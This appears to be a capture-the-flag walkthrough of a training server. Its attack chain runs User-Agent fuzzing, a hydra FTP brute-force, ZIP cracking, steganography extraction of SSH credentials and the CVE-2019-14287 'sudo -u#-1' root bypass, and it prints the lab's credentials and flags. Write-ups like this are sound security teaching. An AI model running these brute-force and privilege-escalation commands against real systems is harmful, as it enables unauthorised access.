Overview
A secret server hidden in the deep sea. The mission: abuse HTTP User-Agent sniffing
to discover a hidden page, chain FTP credentials + ZIP cracking + steganography to
exfil SSH credentials, land a shell as james, then exploit
CVE-2019-14287 (sudo !root bypass) to pop root.
Multi-layered chain with stego, crypto, and a real-world CVE.
nmap → 21/FTP, 22/SSH, 80/HTTP ↓ User-Agent: C → agent_C_attention.php → username "chris" ↓ hydra FTP brute-force → chris:crystal ↓ FTP files: cutie.png (embedded ZIP) + cute-alien.jpg (steghide) ↓ ZIP crack → "alien" → Base64 decode → "Area51" ↓ steghide extract → james:hackerrules! ↓ SSH as james → user flag: b03d975e8c92a7c04146cfa7a5a313c7 ↓ CVE-2019-14287: sudo -u#-1 /bin/bash → root ↓ root flag: b53a02f55b57d4439e3341834d70c062
Port Scan & Service Discovery
$ nmap -sV -sC -T4 -p- --min-rate 3000 -Pn 10.49.129.194
| Port | Service | Version | Notes |
|---|---|---|---|
21/tcp | FTP | vsftpd 3.0.3 | Brute-force target |
22/tcp | SSH | OpenSSH 7.6p1 | Final access vector |
80/tcp | HTTP | Apache 2.4.29 | User-Agent sniffing |
Three open ports. The web server holds the first clue.
User-Agent Sniffing — Agent C
The landing page instructs agents to use their codename as the User-Agent header:
$ for letter in {A..Z}; do wget -S -O /dev/null --header="User-Agent: $letter" http://10.49.129.194/ 2>&1 | grep "Location:" done Location: agent_C_attention.php [Agent C triggers 302 redirect]
Attention chris, Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! From, Agent R
Agent C’s real name: chris — with a confirmed weak password.
FTP Brute-Force & File Extraction
$ hydra -l chris -P /tmp/rockyou.txt ftp://10.49.129.194 -t 10 -f [21][ftp] host: 10.49.129.194 login: chris password: crystal
Three files downloaded via FTP:
| File | Purpose |
|---|---|
To_agentJ.txt | Hint: password hidden inside one of the images |
cutie.png | Contains embedded AES-encrypted ZIP archive |
cute-alien.jpg | Contains steghide-embedded SSH credentials |
Image → ZIP → Base64 → Steghide → Creds
Layer 1: Extract embedded ZIP from cutie.png
$ zsteg cutie.png extradata:0 .. file: Zip archive data (AES Encrypted) Contents: To_agentR.txt $ dd if=cutie.png bs=1 skip=34562 of=hidden.zip
Layer 2: Crack the ZIP password
$ zip2john hidden.zip > hash.txt $ john hash.txt --format=ZIP --wordlist=/tmp/rockyou.txt alien (hidden.zip/To_agentR.txt) $ 7z x -palien hidden.zip
Layer 3: Decode the Base64 string
$ cat To_agentR.txt We need to send the picture to 'QXJlYTUx' as soon as possible! $ echo "QXJlYTUx" | base64 -d Area51
Layer 4: Extract SSH creds from cute-alien.jpg
$ steghide extract -sf cute-alien.jpg -p "Area51" wrote extracted data to "message.txt" $ cat message.txt Hi james, Your login password is hackerrules!
Four layers deep: PNG → ZIP → Base64 → steghide → james:hackerrules!
SSH — User Shell & Flag
$ ssh james@10.49.129.194 Password: hackerrules! $ cat ~/user_flag.txt b03d975e8c92a7c04146cfa7a5a313c7
Home directory also contains Alien_autospy.jpg — depicting the Roswell alien autopsy (1947/1995).
CVE-2019-14287 — sudo !root Bypass
$ sudo -l User james may run the following commands: (ALL, !root) /bin/bash
The rule intends to let james run /bin/bash as any user except root.
However, CVE-2019-14287 (sudo < 1.8.28) allows bypassing the
!root restriction by specifying UID -1, which sudo
incorrectly resolves to UID 0 (root).
$ sudo -u#-1 /bin/bash root@agent-sudo:~# id uid=0(root) gid=1000(james) groups=1000(james) # cat /root/root.txt b53a02f55b57d4439e3341834d70c062
Agent R’s real identity: DesKel
Attack Chain
User-Agent: C → reveals username chris with weak passwordchris:crystal → 3 files downloadedalien) → Base64 (Area51) → steghide → SSH credsjames:hackerrules! → User flag: b03d975e8c92a7c04146cfa7a5a313c7sudo -u#-1 /bin/bash → Root flag: b53a02f55b57d4439e3341834d70c062Vulnerabilities
| Finding | Location | Severity | Impact |
|---|---|---|---|
| CVE-2019-14287 (sudo !root bypass) | sudoers / sudo < 1.8.28 | Critical | Full root via UID -1 overflow |
| Hardcoded SSH creds in steganography | cute-alien.jpg | Critical | Direct SSH access as james |
| Weak FTP password (chris:crystal) | FTP (21) | High | File download, credential chain starts |
| User-Agent based access control | HTTP (80) | High | Username disclosure via header manipulation |
| Weak ZIP password (alien) | Embedded in cutie.png | Medium | Crackable with rockyou in seconds |
Takeaways
crystal) and ZIP (alien) fell
to rockyou instantly. Enforce minimum complexity and length.
Full-Chain Exploit Script
The complete chain is automated in agent_sudo_pwn.sh — port scan,
User-Agent fuzzing, FTP brute-force, stego extraction chain, SSH access, and
CVE-2019-14287 privilege escalation.
$ chmod +x agent_sudo_pwn.sh $ ./agent_sudo_pwn.sh 10.49.129.194 [+] Agent C → chris (weak password confirmed) [+] FTP creds: chris:crystal [+] ZIP password: alien [+] Steghide passphrase: Area51 [+] SSH creds: james:hackerrules! [FLAG] user_flag: b03d975e8c92a7c04146cfa7a5a313c7 [FLAG] root_flag: b53a02f55b57d4439e3341834d70c062
Tools Used
| Tool | Purpose |
|---|---|
nmap | Port scanning and service detection |
wget | User-Agent fuzzing and FTP file retrieval |
hydra | FTP credential brute-force |
zsteg | PNG steganography analysis |
dd | Embedded file extraction from PNG |
john | ZIP password cracking |
7z | AES-encrypted ZIP extraction |
steghide | JPEG steganography extraction |
sshpass | Automated SSH access |
agent_sudo_pwn.sh | Full-chain automated exploit (Bash) |